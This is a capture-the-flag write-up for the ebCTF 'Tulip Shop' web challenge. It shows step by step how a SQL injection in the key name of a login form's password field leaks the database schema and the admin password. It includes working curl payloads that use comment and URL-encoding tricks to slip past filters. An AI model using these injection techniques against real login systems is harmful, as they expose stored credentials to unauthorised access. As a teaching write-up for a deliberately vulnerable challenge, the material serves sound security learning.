ebCTF: WEB100 “Tulip Shop”

We designed a new login procedure for our Online Tulip Shop. Can you test if it is hacker proof?

The WEB100 challenge was apparently harder than expected with only 10 solves. The goal of this challenge was to grep the admin password from the sqlite database with a SQL injection. The SQL injection however was not in one of the normal places, but in the key name of the password field.

When visiting the page you could see in the form source that these values kept changing:

<form action="login.php" method="post">
<label for="user">Username:</label> <input type="text" name="userHVxfOolP" />
<label for="pass">Password:</label> <input type="password" name="passTmWxzSaK" />
<input type="submit" name="submit" value="Login" />

We can trigger the sql injection with this command:

curl -s -d "user=test&pass'or/**/1%3d1--=test"
22: Logged in

The difficulty here is that you can’t use a space or = character, we use /**/ as a space and %3d for the = character. You notice that it displays a 22 instead of the normal 0 during a normal login. So what it probably does is something like:

SELECT COUNT(*) FROM table WHERE userfield='userXXXXXXXX' and passfield='passXXXXXXXX'

Another difficulty here is that this is a sqlite database, but we can gain information from the database using union:

curl -s -d "user=test&pass'union/**/select(sql)from(SQLITE_MASTER)LIMIT/**/2,1--=test"
CREATE TABLE userTable (userName varchar(8),password varchar(40)): Logged in

Again we use /**/ and this time also () instead of spaces, and also a limit to get a successfull union. Since we know how to successfully use union and which table contains the password, we can just walk through all passwords till we find the key:

curl -s -d "user=test&pass'union/**/select(password)from(userTable)limit/**/2,1--=test"
ebCTF{14f4708b7b8f1f45853a2f8d97b58176}: Logged in

Other solves:
A solve by Hardc0de using a blind sql injection technique


Source can be found on: https://github.com/asby/ebctf

Comments are closed.